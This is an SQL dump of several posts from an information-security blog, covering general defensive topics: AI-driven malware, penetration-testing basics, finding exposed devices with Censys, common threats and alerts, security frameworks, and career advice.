Bypassing Endpoint Detection and Response (EDR)\n\nAI can manipulate activity signatures, disguise itself within system processes, and delay execution until it’s no longer being monitored—rendering many endpoint solutions blind to its actions.\n\n## How to Defend Against AI Malware\n\nThe evolving landscape of AI-driven threats requires defenders to adopt equally advanced solutions. Below are key strategies to counteract these dangers:\n\n### 1. Implement AI-Powered Defenses\n\nSecurity teams must deploy AI-driven solutions capable of analyzing vast data sets, identifying anomalies, and detecting AI malware in real-time. Tools powered by AI can match the sophistication of these emerging threats.\n\n### 2. Adopt a Zero Trust Architecture (ZTA)\n\nIntroduce a Zero Trust Model that assumes no user or system is inherently secure. Strengthen defenses with strict access controls, multi-factor authentication (MFA), and ongoing system monitoring.\n\n### 3. Upgrade to Advanced Endpoint Protection\n\nUse next-generation antivirus (NGAV) and endpoint detection and response (EDR) solutions built on ML. These tools recognize behavior patterns and preemptively block suspicious activity.\n\n### 4. Leverage Threat Intelligence\n\nEquip teams with up-to-date threat intelligence and train ML models to identify emerging AI attack patterns, keeping defenses a step ahead of attackers.\n\n### 5. Train Employees to Identify Threats\n\nHuman errors remain a major vulnerability. Conduct regular training to help employees recognize phishing attempts, malicious URLs, and social engineering tricks deployed by AI.\n\n### 6. Regularly Patch Software\n\nKeeping systems updated is crucial. Attackers often exploit unpatched vulnerabilities to gain unauthorized access. Frequent software patching helps close these doors.\n\n### 7. Behavioral and Anomaly Analysis\n\nBehavior-based tools monitor abnormal patterns in network traffic, user activity, and endpoint devices. 
These analytics can detect threats that bypass traditional defenses.\n\n## Why Act Now?\n\nAI-driven cyberattacks are no longer a future possibility—they’re happening now, and organizations must act decisively to protect themselves. Whether you\'re leading a blue team or a cybersecurity organization, adapting to these threats with agile, AI-enhanced defensive strategies is no longer optional but essential.\n\nBy combining proactive defense mechanisms with human vigilance, you can lower exposure to risk and safeguard your systems more effectively.\n\n## Key Takeaways\n\n1. AI malware adapts and evolves, offering attackers an unprecedented advantage over traditional defenses.\n2. Proactive AI-powered tools are essential to detecting and responding to these threats.\n3. Strategies like Zero Trust Architecture, regular patching, and behavioral analysis fortify your defenses.\n4. Cybersecurity training is critical to protecting organizations from AI-powered phishing and social engineering.\n\nPrepare your organization for the next generation of cybersecurity threats. Arm your security teams with advanced tools and continuously refine your strategies to stay ahead of attackers.', '', 'http://infoseclabs.io/uploads/1768414450494-931549616.png', 'AI-generated malware concept illustrating cybersecurity threats', 1, 'published', '2025-02-23 11:25:00', '2026-01-14 21:14:25', 'Information Security', 'AI-Generated Malware: Cybersecurity Threats & Defense', 'Discover how AI-generated malware poses new cybersecurity threats and learn effective strategies to protect your systems.', 'AI malware'),
(33, 'Unlocking Cybersecurity: A Beginner\'s Guide to Penetration Testing', 'introduction-to-penetration-testing-tools-and-techniques', '# The Essential Guide to Penetration Testing\n\nCybersecurity is no longer optional—it\'s essential. With cyberattacks growing more sophisticated, penetration testing (or \"pen testing\") has become a critical strategy for both businesses and individuals to protect their sensitive data and systems. This beginner-friendly guide will walk you through the fundamentals of penetration testing, methodologies, tools, and practical steps to get started.\n\n## What is Penetration Testing?\n\nPenetration testing is a thorough, controlled, and ethical process of simulating a cyberattack on a computer system, network, or application. The goal is to identify security vulnerabilities before malicious hackers can exploit them. Think of it as hiring a \"friendly hacker\" to break into your systems to expose any weak spots, allowing you to fix them before a real attacker discovers them.\n\n### Why is Penetration Testing Important?\n\nPenetration testing provides several key benefits:\n\n- **Early Detection**: Unearth vulnerabilities and address them before cybercriminals do.\n- **Compliance**: Meet regulatory requirements (like PCI-DSS, HIPAA, or GDPR) that mandate regular security assessments.\n- **Risk Reduction**: Safeguard your data, reputation, and financial resources by reducing exposure to breaches.\n- **Proactive Defense**: Stay ahead of attackers by mimicking their tactics and learning how to counteract them effectively.\n\nFrom business owners to individual home computer users, penetration testing helps ensure peace of mind by proactively enhancing security measures.\n\n## Common Penetration Testing Methodologies\n\nThere isn’t a one-size-fits-all approach to penetration testing. Depending on the scope, access level, and goals, ethical hackers typically choose one of three main methodologies:\n\n### 1. 
Black-Box Testing\n\n- The tester has no prior knowledge of the system or its defenses.\n- Mimics an attack from an outsider who has to gather information from scratch.\n- **Best for** evaluating external threats.\n\n### 2. White-Box Testing\n\n- The tester is given full access to the system’s architecture, including source codes and network diagrams.\n- Ideal for finding deep, system-level vulnerabilities.\n- **Best for** internal audits and advanced analysis.\n\n### 3. Gray-Box Testing\n\n- The middle ground—testers have partial knowledge of the system, such as user credentials or architectural insights.\n- Simulates an attack by someone with limited insider knowledge (e.g., an employee with restricted access).\n- **Best for** balanced insights into both internal and external vulnerabilities.\n\n## The Essential Tools of Penetration Testing\n\nEffective penetration testing relies heavily on using the right tools. Here’s an overview of some of the most popular tools among ethical hackers:\n\n### 1. Metasploit\n\n- **Type of tool**: Framework\n- Ideal for testing vulnerabilities in networks, operating systems, and applications.\n- **Feature highlight**: Provides exploit modules to simulate a wide range of real-world attacks.\n\n### 2. Nmap (Network Mapper)\n\n- **Type of tool**: Scanning/Reconnaissance\n- **Purpose**: Maps out network structures and identifies potential weaknesses.\n- **Feature highlight**: Quick and efficient system and port scanning.\n\n### 3. Wireshark\n\n- **Type of tool**: Packet Analyzer\n- **Purpose**: Monitors network traffic to detect suspicious activity.\n- **Feature highlight**: Allows testers to examine data flow across networks in real-time.\n\n### 4. 
Burp Suite\n\n- **Type of tool**: Web Security Testing\n- **Purpose**: Detects and exploits vulnerabilities in web applications.\n- **Feature highlight**: Manages everything from mapping application vulnerabilities to finding loopholes in APIs.\n\nThese tools are just the tip of the iceberg, with countless options available for various needs, from wireless network testing to password cracking.\n\n## Getting Started with Penetration Testing\n\nBreaking into the world of penetration testing requires proper knowledge, ethical practice, and continuous learning. Here’s how you can get started:\n\n### 1. Build Your Foundation\n\nBegin by understanding networking, cybersecurity concepts, and system architectures. Familiarize yourself with protocols like HTTP, FTP, and TCP/IP.\n\n### 2. Learn Ethical Hacking\n\nEnroll in beginner-friendly training programs like **EC-Council’s CEH (Certified Ethical Hacker)** or **CompTIA Security+**. Online platforms like Cybrary, Hack The Box, and TryHackMe provide hands-on, gamified environments where you can practice your skills.\n\n### 3. Get Hands-On Experience\n\nStart exploring real-life scenarios in labs and controlled environments. Tools like Kali Linux, which includes pre-installed penetration testing tools, are a great way to practice.\n\n### 4. Stay Updated\n\nCybersecurity threats evolve rapidly. Regularly update your skills by attending webinars, reading the latest cybersecurity reports, and joining ethical hacking communities.\n\n## Real-World Examples of Penetration Testing Success\n\nPenetration testing has already saved countless businesses from devastating attacks. Here are some real-world examples:\n\n1. **Preventing a Financial Breach**  \n   A major banking institution discovered weaknesses in their online banking system through penetration testing. Vulnerabilities patched during testing prevented potential multi-million-dollar data leaks.\n\n2. 
**Strengthening E-Commerce Security**  \n   A popular online retail site identified loopholes in their payment processor\'s API. By fixing these vulnerabilities, they avoided both financial losses and reputational harm.\n\nThese success stories demonstrate just how effective penetration testing can be in safeguarding digital assets.', '', 'http://infoseclabs.io/uploads/1768414555190-777059998.jpg', NULL, 1, 'published', '2025-02-20 13:47:00', '2026-01-14 21:16:15', 'Information Security', 'Introduction to Penetration Testing: Tools and Techniques', NULL, NULL),
(34, 'Exploring Censys: Discovering Unsecured Devices on the Public Internet', 'finding-weird-devices-on-the-public-internet', '# Exploring Unexpected Devices on the Public Internet\n\nHave you ever wondered how many peculiar or unexpected devices are accessible on the public internet? From unsecured cameras to exposed billboards, a surprising number of devices are left open for anyone to find—raising serious questions about cybersecurity and privacy. This guide dives deep into the oddities lurking across the web, how they’re discovered, and why cybersecurity enthusiasts should pay attention.\n\n## The Search Begins with Censys\n\n### What is Censys?\n\nCensys is an advanced internet intelligence platform often described as \"Google for the entire internet.\" It allows users to scan the open web for connected devices, services, and ports. Think of it as a cybersecurity tool enabling users to gain insights into devices or services that may be inadvertently exposed online.\n\nUsing Censys, you can search for information such as:\n\n- IP addresses\n- Protocols and ports\n- Device types\n- Metadata of services and software\n\nThe platform is widely used for threat hunting, research, and attack surface management.\n\n## How Weird Devices Get Exposed Online\n\nThe open internet is home to numerous devices that shouldn\'t be publicly accessible. These range from security cameras to industrial control systems. 
For example:\n\n- **Unsecured Cameras**: Devices like IP cameras can be accessed without authentication due to poor configuration.\n- **Industrial Control Systems (ICS)**: Systems controlling factories or critical infrastructure occasionally show up, exposing sensitive operational data.\n- **Publicly Accessible Billboards**: Devices like electronic billboards with remote login vulnerabilities allow you to access their settings.\n\nThe reasons devices get exposed vary, including misconfigured networks, outdated software, or default credentials being left unchanged.\n\n## Real-life Examples of Exposed Devices\n\nUsing creative search queries in Censys, cybersecurity professionals (and cyber attackers alike) can uncover an array of fascinating and sometimes alarming devices:\n\n- **Billboards**: Researchers have found electronic billboards whose setups allow unauthorized users to change their displayed content.\n- **Traffic Cameras**: Instances of public traffic or surveillance cameras left accessible without passwords have been reported, leading to potential privacy breaches.\n- **Building Automation Systems**: Devices managing HVAC systems, lights, or elevators are occasionally accessible, potentially disrupting operations.\n\nEach discovery highlights the importance of securing devices and minimizing exposure.\n\n## How Censys Users Discover These Devices\n\nTo uncover these devices, users rely on pre-built queries or create their own using Censys’ filters. A valuable resource for inspiration is the \"Awesome Censys Queries\" repository on GitHub, which includes examples for tracking:\n\n- Modbus Protocols (Industrial devices)\n- IP Cameras\n- Remote Access Services like RDP or VNC\n- Password-protected sites with weak credentials\n\nThese queries allow users to filter results by protocols, geolocation, device types, and even metadata associated with devices or services.\n\n## The Ethical Dilemma\n\nAccessing publicly exposed devices brings ethical challenges. 
While tools like Censys are designed for legitimate cybersecurity purposes, it is important to ensure any exploration adheres to ethical guidelines. Accessing or tampering with these devices without the owner’s permission can lead to legal repercussions.\n\nFor ethical cybersecurity enthusiasts:\n\n1. Use tools such as Censys for research and educational purposes only.\n2. Report vulnerabilities to the device owners or responsible parties when identified.\n3. Avoid altering or accessing sensitive data to minimize harm.\n\n## Why Cybersecurity Professionals Should Care\n\nUnderstanding the types of devices exposed online is critical for several reasons:\n\n1. **Threat Awareness**: Knowing what’s out there raises awareness of risks posed by unsecured devices.\n2. **Reducing Attack Surfaces**: IT professionals use tools like Censys to monitor and secure their organization’s devices.\n3. **Strengthening Best Practices**: Identifying vulnerabilities showcases the importance of applying cybersecurity best practices, such as disabling unused ports and using strong, unique credentials.\n\n## Top Tips for Securing Devices\n\nTo minimize device exposure and safeguard sensitive data:\n\n- **Update Regularly**: Ensure all devices run the latest software to mitigate known vulnerabilities.\n- **Change Default Credentials**: Replace default usernames and passwords with strong, unique combinations.\n- **Restrict Access**: Limit which networks can access devices using firewalls or VPNs.\n- **Monitor Open Ports**: Use tools like Censys to periodically check what devices or services are publicly accessible.\n\nThe public internet is full of fascinating but sometimes alarming surprises. With tools like Censys, cybersecurity enthusiasts have the opportunity to explore, research, and contribute to a safer digital world. 
However, with great power comes great responsibility—always adhere to ethical practices when using such tools.', '', 'http://infoseclabs.io/uploads/1768621975620-268813292.png', 'Unsecured internet devices like cameras and billboards exposed online', 1, 'published', '2026-01-16 16:34:00', '2026-01-17 06:52:58', 'Information Security', 'Discovering WEIRD Devices Online', 'Explore the surprising world of unsecured devices on the internet and learn why cybersecurity is crucial.', 'WEIRD Devices'),
(35, '10 Common Cyber Threats and How to Mitigate Them', '10-common-cyber-threats-and-how-to-mitigate-them', '# 10 Common Cyber Threats and How to Mitigate Them\n\n**Published: January 25, 2026 | InfoSecLabs**\n\nCyber threats are continuously evolving, posing serious risks to businesses, governments, and individual users. The consequences can range from financial loss and stolen data to disrupted operations. To stay ahead, it is crucial to understand the most common cyber threats and how to effectively mitigate them. Whether you\'re an IT security expert or a homeowner managing a smart device, this guide is for you.\n\n## 1. Phishing\n\n### What It Is\nPhishing attacks involve tricking users into revealing sensitive information, such as usernames, passwords, or financial details, through deceptive emails or messages.\n\n### Real-World Example\nThe infamous attack on a major social media company in 2020 originated from a phishing scam. Employees were deceived into providing access credentials, leading to compromised accounts of high-profile users.\n\n### How to Mitigate It\n- **Employee Training:** Educate employees about recognizing suspicious emails and links.\n- **Email Filters:** Implement spam and phishing filters to flag suspicious emails.\n- **Multi-Factor Authentication (MFA):** Even if credentials are stolen, MFA adds an extra layer of protection.\n\n## 2. Ransomware\n\n### What It Is\nRansomware encrypts a victim’s files and demands payment for the decryption key, locking users out of critical data.\n\n### Real-World Example\nThe 2017 WannaCry attack affected over 300,000 computers globally, crippling healthcare services, governments, and corporations.\n\n### How to Mitigate It\n- **Regular Backups:** Ensure all critical data is backed up and stored offline.\n- **Software Updates:** Keep operating systems and software up-to-date to patch vulnerabilities.\n- **Endpoint Security:** Deploy robust anti-ransomware tools.\n\n## 3. 
Distributed Denial of Service (DDoS) Attacks\n\n### What It Is\nA DDoS attack floods your network or server with traffic, making it unavailable to legitimate users.\n\n### Real-World Example\nA major DNS provider was hit with a DDoS attack in 2016, temporarily taking down websites like Netflix, Twitter, and PayPal.\n\n### How to Mitigate It\n- **Traffic Monitoring:** Use tools to identify and filter unusual traffic patterns.\n- **Content Delivery Networks (CDNs):** CDNs help distribute and manage traffic more effectively.\n- **Firewall Rules:** Implement application firewalls to block malicious requests.\n\n## 4. Malware\n\n### What It Is\nMalware encompasses a variety of harmful software, including viruses, worms, and trojans, that infiltrate systems to disrupt operations or steal data.\n\n### Real-World Example\nThe infamous Stuxnet worm targeted industrial systems, reportedly damaging a nuclear facility’s infrastructure.\n\n### How to Mitigate It\n- **Antivirus Software:** Ensure antivirus tools are installed and regularly updated.\n- **Safe Browsing:** Avoid downloading files or software from unknown sources.\n- **Least Privilege:** Limit user access to critical systems and data.\n\n## 5. Social Engineering\n\n### What It Is\nSocial engineering manipulates individuals into divulging confidential information through psychological tricks, often bypassing technical defenses entirely.\n\n### Real-World Example\nCybercriminals posed as IT support and convinced employees of a large corporation to share login details, leading to a major data breach.\n\n### How to Mitigate It\n- **Awareness Campaigns:** Train employees on common social engineering tactics like pretexting.\n- **Verification Protocols:** Always verify the identity of individuals requesting sensitive information.\n- **Simulated Attacks:** Conduct periodic tests to educate and prepare your team.\n\n## 6. 
Insider Threats\n\n### What It Is\nAn insider threat arises when an employee, contractor, or third party intentionally or unintentionally compromises security from within.\n\n### Real-World Example\nA disgruntled employee leaked critical company data to competitors as revenge for being laid off.\n\n### How to Mitigate It\n- **User Monitoring:** Monitor for unusual user activity or data access patterns.\n- **Access Controls:** Restrict access to sensitive data based on role and necessity (RBAC).\n- **Exit Protocols:** Revoke access rights immediately when an employee leaves the organization.\n\n## 7. Zero-Day Exploits\n\n### What It Is\nZero-day exploits target vulnerabilities in software that are unknown to the vendor, leaving no time for a patch before the attack occurs.\n\n### Real-World Example\nThe 2021 Microsoft Exchange Server hack targeted previously unknown vulnerabilities, compromising thousands of servers globally.\n\n### How to Mitigate It\n- **Defense in Depth:** Use multiple layers of security so one failure isn\'t catastrophic.\n- **Threat Intelligence:** Utilize AI tools to monitor for emerging threats.\n- **Network Segmentation:** Limit the impact of intrusions by isolating systems.\n\n## 8. SQL Injection (SQLi)\n\n### What It Is\nAttackers inject malicious SQL code into a web application\'s database queries, allowing them to view, modify, or delete database data.\n\n### Real-World Example\nMany high-profile data breaches involving millions of user records have stemmed from unpatched SQL injection vulnerabilities in web forms.\n\n### How to Mitigate It\n- **Prepared Statements:** Use parameterized queries to ensure inputs are treated as data, not code.\n- **Input Validation:** Sanitize and validate all user inputs on the server side.\n- **Regular Testing:** Perform SQLi vulnerability scans on all web applications.\n\n## 9. 
Man-in-the-Middle (MitM) Attacks\n\n### What It Is\nAn attacker intercepts communication between two parties (e.g., a user and their bank) to eavesdrop or alter the data being exchanged.\n\n### Real-World Example\nAttackers setting up rogue Wi-Fi hotspots in coffee shops to intercept login credentials from unsuspecting users.\n\n### How to Mitigate It\n- **Encryption:** Enforce HTTPS and TLS for all data in transit.\n- **VPN Use:** Encourage the use of Virtual Private Networks (VPNs) on public Wi-Fi.\n- **Endpoint Security:** Detect and block unauthorized interception tools.\n\n## 10. Credential Stuffing\n\n### What It Is\nAttackers use automated bots to test millions of username/password pairs stolen from other breaches against various websites, betting on users reusing passwords.\n\n### Real-World Example\nIn 2020, hundreds of thousands of user accounts on a popular video game platform were compromised due to reused passwords from other leaks.\n\n### How to Mitigate It\n- **Password Policies:** Enforce strong, unique passwords and ban common ones.\n- **Rate Limiting:** Block IP addresses that make too many failed login attempts.\n- **MFA:** Require a second form of verification to stop attackers even if they have the password.\n\n\nCybersecurity is a shared responsibility. By understanding these 10 common threats and implementing strong mitigation strategies, organizations and individuals can significantly reduce their risk profile. Stay vigilant, keep learning, and prioritize security in every digital interaction.', '', 'http://infoseclabs.io/uploads/1769226516310-299248879.jpg', 'Illustration of cybersecurity defense against cyber threats', 1, 'published', '2026-01-22 21:43:00', '2026-01-25 22:03:00', 'Information Security', 'Top 10 Cyber Threats & Mitigation Strategies', 'Discover common cyber threats and learn effective ways to mitigate them. Stay secure with our expert guide.', 'Cyber Threats'),
(36, 'Top Cybersecurity Alerts Every Organization Must Know and How to Handle Them', 'most-common-cybersecurity-alerts-in-organizations', '# Understanding Cybersecurity Alerts\n\nCyber threats are on the rise, and organizations face a constant battle to secure their systems. One of the first lines of defense? Cybersecurity alerts. These alerts serve as invaluable early warnings, highlighting vulnerabilities or potential breaches within a network.\n\nIf you\'re aiming to enhance your organization\'s cybersecurity defenses, understanding the most frequently seen alerts is crucial. Here\'s an in-depth look at the most common cybersecurity alerts encountered by organizations and how to tackle them effectively.\n\n## What Are Cybersecurity Alerts?\n\nCybersecurity alerts notify you of potential threats or vulnerabilities in your organization\'s network, applications, or systems. They originate from tools like intrusion detection systems (IDS), firewalls, endpoint protection solutions, and Security Information and Event Management (SIEM) platforms. These alerts help organizations identify risks early and respond swiftly, reducing potential damage.\n\nLet\'s explore the most common types of these alerts and what steps organizations can take to address them.\n\n### 1. Phishing Attempts\n\nPhishing is one of the most widespread cyber threats, targeting organizations across industries. These alerts indicate suspicious emails containing malicious links or attachments designed to steal sensitive information like login credentials or financial data.\n\n#### How to Respond:\n\n- Immediately identify and quarantine phishing attempts.\n- Educate employees on spotting phishing emails to prevent incidents.\n- Implement email security filters and multi-factor authentication (MFA).\n\n#### Why This Matters:\n\nPhishing attacks are growing more sophisticated, and even a single successful attempt can result in data breaches or financial losses.\n\n### 2. 
Malware Detection\n\nCybersecurity systems often flag malware activities, such as viruses, spyware, worms, trojans, or ransomware. Malware can quickly spread across networks, infecting systems and jeopardizing sensitive data.\n\n#### How to Respond:\n\n- Isolate infected devices to contain the spread.\n- Conduct a thorough scan to identify compromised data or systems.\n- Initiate remediation through antivirus tools and advanced threat detection platforms.\n\n#### Why This Matters:\n\nMalware attacks often cascade into other issues like data theft or operational downtime, making swift responses critical.\n\n### 3. Unauthorized Access Attempts\n\nUnauthorized access alerts occur when individuals attempt to gain entry into restricted areas of your network. This can stem from external attacks, such as brute force attempts, or internal risks like compromised credentials.\n\n#### How to Respond:\n\n- Confirm the legitimacy of access attempts.\n- Revoke access for compromised credentials and reset passwords.\n- Strengthen access controls with MFA and IP whitelisting.\n\n#### Why This Matters:\n\nUnauthorized access increases risks of data exfiltration, operational disruptions, or insider threats.\n\n### 4. Data Exfiltration Alerts\n\nThese alerts signal that sensitive data might be leaving your organization without authorization. Often, they indicate unauthorized cloud storage uploads, large file transfers, or unusual outbound traffic.\n\n#### How to Respond:\n\n- Halt the unauthorized transfer immediately.\n- Investigate the source of data exfiltration and pinpoint affected data.\n- Enforce stricter Data Loss Prevention (DLP) policies.\n\n#### Why This Matters:\n\nData exfiltration not only risks compliance violations (think GDPR or HIPAA fines) but also damages an organization\'s reputation with clients and stakeholders.\n\n### 5. 
Denial-of-Service (DoS) Attacks\n\nDenial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks overwhelm organizational systems with excessive traffic, rendering critical services unavailable. These alerts detect instances of abnormal traffic spikes.\n\n#### How to Respond:\n\n- Configure rate-limiting rules to regulate traffic spikes.\n- Leverage Content Delivery Networks (CDNs) to absorb attacks.\n- Work closely with Internet Service Providers (ISPs) for mitigation measures.\n\n#### Why This Matters:\n\nDoS attacks can paralyze systems and jeopardize your organization\'s ability to serve customers effectively.\n\n### 6. Vulnerability Exploits\n\nVulnerability exploit alerts indicate attempts to exploit known weaknesses in your system. These could target zero-day flaws, outdated software, or misconfigurations left unpatched.\n\n#### How to Respond:\n\n- Immediately apply security patches for known vulnerabilities.\n- Conduct regular vulnerability scans to identify weak points.\n- Prioritize monitoring and addressing critical assets.\n\n#### Why This Matters:\n\nAttackers often exploit known vulnerabilities within hours of their discovery—proactive defenses are non-negotiable.\n\n### 7. Insider Threats\n\nCybersecurity alerts don\'t always point to external threats. Sometimes, the risk comes from employees or contractors who misuse access, either intentionally or accidentally. Behavioral analytics flags unusual activities, such as accessing files at odd hours or downloading large volumes of data.\n\n#### How to Respond:\n\n- Begin a thorough investigation to determine intent.\n- Address negligence with training or correct malicious behavior with corrective action.\n- Update access policies to reflect stricter protocols.\n\n#### Why This Matters:\n\nInsider threats bypass external defenses, making them particularly dangerous and harder to detect.\n\n### 8. 
Configuration Change Alerts\n\nUnexpected system configuration changes (e.g., adjustments to security policies or access privileges) often indicate an attempt to weaken defenses. These changes are flagged to keep your systems secure.', '', 'http://infoseclabs.io/uploads/1769364323926-514133078.png', 'Illustration of cybersecurity alert notifications on a digital interface', 1, 'published', '2026-01-25 13:01:00', '2026-01-25 21:05:32', 'Information Security', 'Top Cybersecurity Alerts & Solutions', 'Learn about crucial cybersecurity alerts and how to handle them effectively to protect your organization.', 'Cybersecurity alerts'),
(37, 'Understanding Cybersecurity Frameworks: NIST, ISO, and More', 'understanding-cybersecurity-frameworks-nist-iso-and-more', '# Cybersecurity Frameworks: Enhancing Security in the Digital Age\n\nCybersecurity remains a top priority for businesses and individuals in our increasingly digital world. Understanding how to secure sensitive information and combat cyber threats can be daunting. This is where cybersecurity frameworks come into play—they serve as structured guidelines to improve security measures and minimize risks. For IT professionals, business owners, and cybersecurity enthusiasts alike, understanding these frameworks is essential for building a strong defense.\n\nThis article will guide you through some of the most popular cybersecurity frameworks, including NIST and ISO, and how they can benefit your organization.\n\n## What Are Cybersecurity Frameworks?\n\nCybersecurity frameworks are structured guidelines and best practices designed to help organizations identify, manage, and mitigate security risks. They offer a comprehensive approach to building a robust cybersecurity strategy, addressing everything from risk assessments to incident response.\n\nFrameworks provide a common language for teams to discuss security, ensuring consistency and alignment across the organization. They are essential for:\n\n- Protecting sensitive information from cyber threats.\n- Meeting compliance requirements for industry regulations.\n- Giving stakeholders confidence in the organization\'s security measures.\n\n## The NIST Cybersecurity Framework\n\nThe **NIST Cybersecurity Framework (CSF)**, developed by the National Institute of Standards and Technology, has become a gold standard for organizations worldwide. 
Initially intended to secure critical infrastructure, NIST is now widely adopted by businesses across industries for its flexibility and robust structure.\n\n### Key Functions of the NIST Framework\n\nThe NIST CSF is based on five core functions that define the lifecycle of a cybersecurity program:\n\n1. **Identify** – Understand your systems, assets, and risks.\n2. **Protect** – Implement safeguards to ensure services and data are secure.\n3. **Detect** – Monitor for anomalies and potential breaches.\n4. **Respond** – Have a plan to contain and mitigate threats.\n5. **Recover** – Restore operations and data after a security incident.\n\nEach function includes specific categories and subcategories to address various aspects of cybersecurity, making it adaptable and accessible to organizations large and small.\n\n### Why Choose NIST?\n\n- **Flexibility:** The framework is scalable and can be tailored to any industry or business size.\n- **Alignment:** Incorporates global standards, making it easier to align with other frameworks or regulations.\n- **Accessibility:** Free and widely available, making it an excellent option for businesses starting their cybersecurity planning.\n\n## ISO/IEC 27001\n\nThe **ISO/IEC 27001** is an internationally recognized standard for information security management systems (ISMS). 
It provides organizations with a systematic approach to managing sensitive information and ensures they meet high standards of security.\n\n### Core Elements of ISO/IEC 27001\n\n- Development of an Information Security Management System (ISMS) tailored to the organization\'s needs.\n- Risk assessments and ongoing evaluation of threats.\n- Implementing a framework of policies, controls, and procedures to mitigate risks.\n\nISO/IEC 27001 certification demonstrates to stakeholders, clients, and regulators that your organization is committed to maintaining robust cybersecurity standards.\n\n### Benefits of ISO/IEC 27001\n\n- **Global Credibility:** Being ISO-certified boosts credibility and trust among partners and customers.\n- **Compliance:** Helps meet regulatory and contractual requirements.\n- **Holistic Approach:** Focuses on both technology and processes for information security.\n\n## NIST vs. ISO/IEC 27001\n\nWhile both frameworks aim to enhance cybersecurity, they differ in scope and structure. Here\'s a quick comparison:\n\n| Aspect        | NIST CSF                                        | ISO/IEC 27001                              |\n|---------------|-------------------------------------------------|--------------------------------------------|\n| Focus         | Cybersecurity for critical operations           | Holistic information security management   |\n| Adoption      | Widely used in the U.S. and adaptable globally  | Recognized worldwide                       |\n| Certification | No formal certification                         | Certification available                    |\n| Flexibility   | Highly adaptable for various organizations      | Focused on systematic ISMS approach        |\n| Cost          | Free to use                                     | Relatively higher cost of implementation   |\n\n### Combining NIST and ISO\n\nMany organizations choose to combine elements of NIST and ISO. 
For instance, they may follow NIST\'s guidelines for cybersecurity while adopting ISO\'s structure for documenting and managing risks.\n\n## Other Notable Frameworks\n\nBeyond NIST and ISO, several other frameworks cater to specific cybersecurity needs:\n\n- **CIS Controls:** Offers a prioritized set of actions to defend against common cyber threats.\n- **COBIT:** Focuses on governance and management of enterprise IT.\n- **HIPAA Security Rule:** Ensures the privacy and security of health information in the healthcare sector.\n\nThese frameworks often work well alongside NIST or ISO, helping organizations tailor their approach based on industry-specific needs.\n\n## How to Apply Cybersecurity Frameworks in Practice\n\nHere are a few examples of how organizations can implement these frameworks effectively:', '', 'http://infoseclabs.io/uploads/1769824241468-134111856.jpg', 'Illustration of cybersecurity frameworks like NIST and ISO', 1, 'published', '2026-01-30 13:39:00', '2026-01-31 04:50:46', 'Information Security', 'Guide to Cybersecurity Frameworks: NIST & ISO', 'Explore NIST and ISO frameworks to enhance your cybersecurity strategy and protect sensitive data effectively.', 'Cybersecurity Frameworks');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(38, 'The Truth About Starting a Career in Cybersecurity with Bootcamp', 'the-truth-about-starting-a-career-in-cybersecurity-with-bootcamp', '# Breaking into Cybersecurity: A Comprehensive Guide\n\nThe field of cybersecurity has gained immense popularity in recent years, and with good reason. From protecting sensitive information to safeguarding systems against attacks, cybersecurity professionals play a vital role in the modern digital ecosystem. With increased demand, however, comes an abundance of training programs promising to fast-track individuals to six-figure salaries in just a few weeks. Unfortunately, many of these claims are misleading.\n\nIf you’re thinking about pursuing a career in cybersecurity, this detailed guide will help you understand the realities of entering the field, the importance of mastering foundational skills before diving into advanced certifications, and how to structure your learning to set yourself up for success.\n\n## Understanding the Hype Around Cybersecurity Training Programs\n\nYou\'ve likely seen advertisements about cybersecurity bootcamps or courses claiming you’ll earn $100,000 after completing a short training program. While it’s easy to fall for such promises, the reality is far different. According to industry experts, this oversimplified approach neglects the depth of knowledge and hands-on experience required to succeed in a cybersecurity role.\n\n### Why the Hype Can Be Misleading\n\n1. **Lack of Basics**: Many training providers focus exclusively on advanced certifications like Security+ while skipping essential foundational knowledge like networking and system administration.\n2. **False Promises**: Claims of instant high-paying jobs are often exaggerated. Employers hire for skills, experience, and confidence, none of which are gained overnight.\n3. 
**Profit-Driven Approach**: Some programs are designed by businesses more focused on boosting their revenue than truly equipping students with the necessary skills.\n\n## Mastering the Foundations Before Cybersecurity\n\nOne of the most important lessons for aspiring cybersecurity professionals is simple: _you can’t secure what you don’t understand_. Before jumping into cybersecurity, you need a solid understanding of how IT systems work. Here’s how to get started:\n\n### 1. Start With IT Fundamentals\n\nIf you’re completely new to tech, begin with a course like **CompTIA IT Fundamentals (ITF+)** to familiarize yourself with basic IT concepts. Learn about hardware, software, and how operating systems function.\n\n### 2. Focus on System Administration\n\nUnderstand how core components like RAM, CPUs, and hard drives interact. Learn the basics of maintaining systems, securing data, and managing configurations. Certifications like **CompTIA A+** can help solidify these concepts.\n\n### 3. Learn Networking Essentials\n\nNetworking is at the heart of cybersecurity, so it’s crucial to learn about how devices communicate. Start with **CompTIA Network+** or a vendor-specific certification like **Cisco\'s CCNA** to grasp key concepts like IP addressing, routing, subnets, and networking protocols.\n\n### Why These Steps Matter\n\nYou can’t secure a device, network, or system unless you understand how it operates. Jumping straight to advanced cybersecurity concepts without these fundamentals will leave you ill-prepared for real-world challenges.\n\n## Building a Strong Pathway to Cybersecurity\n\nOnce you’ve established a solid IT foundation, you’re ready to begin exploring cybersecurity. Follow a progressive learning path to build your expertise step by step.\n\n### 1. 
Start With Security Basics\n\n- **Recommended Certification**: **CompTIA Security+**\n- Learn about network security, access controls, and threat management.\n- Focus on understanding security principles rather than simply memorizing facts.\n\n### 2. Explore Specialized Roles\n\nCybersecurity is a vast field, so it’s essential to identify your area of interest:\n\n- **Penetration Testing**: Learn ethical hacking techniques through certifications like **CEH (Certified Ethical Hacker)** or **OSCP (Offensive Security Certified Professional)**.\n- **Security Analyst**: Progress to certifications like **CySA+** or advanced credentials like **CISSP (Certified Information Systems Security Professional)**.\n\n### 3. Gain Hands-On Experience\n\nCybersecurity isn’t just theoretical. Employers value hands-on experience, so look for opportunities to practice in real-world or simulated environments:\n\n- **Labs and Simulations**: Platforms like TryHackMe, Hack The Box, or virtual labs built within certification courses.\n- **Internships and Entry-Level Jobs**: Start as an IT support technician or systems administrator to gain experience while building your cybersecurity knowledge.\n\n### 4. Continue Learning and Adapting\n\nTechnology evolves rapidly, and so do cybersecurity threats. Commit to lifelong learning through continuing education, industry webinars, or by staying current with new certifications.\n\n## The Importance of Time and Patience\n\nBuilding a career in cybersecurity doesn’t happen in a matter of weeks. It’s a profession that requires dedication and continuous learning. 
